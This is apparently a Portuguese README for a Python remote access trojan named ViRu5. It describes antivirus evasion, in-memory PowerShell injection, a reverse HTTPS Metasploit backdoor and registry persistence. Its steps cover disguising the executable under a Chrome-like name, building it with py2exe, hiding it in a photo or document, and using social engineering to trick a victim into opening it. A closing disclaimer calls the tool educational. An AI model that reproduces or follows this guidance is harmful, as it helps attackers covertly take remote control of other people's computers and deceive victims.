python-rootkit
Este é um RAT python totalmente indetectável que pode contornar quase todos os antivírus e abrir uma backdoor em qualquer máquina Windows que estabelecerá uma conexão reversa https Metasploit com sua máquina de escuta.
Ciclo de vida do ViRu5
- Contornar todos os antivírus.
- Injetar um script powershell malicioso na memória.
- Estabelecer uma conexão reversa https para a máquina do atacante.
- Verificar a cada 10 segundos e garantir que a conexão ainda existe. Se não, irá restabelecer uma nova conexão.
- Adicionar uma chave de registro de inicialização para reconectar ao atacante após reinicialização.
Passos
- Atualizar os parâmetros viRu5/source.py com seu lhost e lport
- Alterar o nome de source.py para GoogleChromeAutoLaunch.py
- Adicionar GoogleChromeAutoLaunch.py, setup.py e seu ícone como icon.ico no diretório c:\python27
- Pelo cmd, faça:
cd c:\python27 && python setup.py py2exe
- Encontrar o arquivo RAT no diretório Dist.
- Ocultá-lo com qualquer foto, pdf, word ou qualquer tipo de arquivo
- Enviá-lo para a vítima
- Usar suas habilidades de engenharia social para fazê-lo abrir os arquivos
- Você receberá uma conexão reversa https Metasploit :)
Testado em
- Windows 7 x64/x86
- Windows 8
- Windows 8.1 x64/x86
- Windows 10 x64/x86
Agradecimentos
Agradecimentos a todos os pesquisadores de segurança que dedicam tempo para ajudar as pessoas e tornar a comunidade mais forte. Obrigado aos caras do PowerShellEmpire.
Aviso Legal
Isso é apenas para fins educacionais. Primeiramente, este código visa alertar as pessoas sobre problemas de segurança em máquinas infectadas e não corrigidas.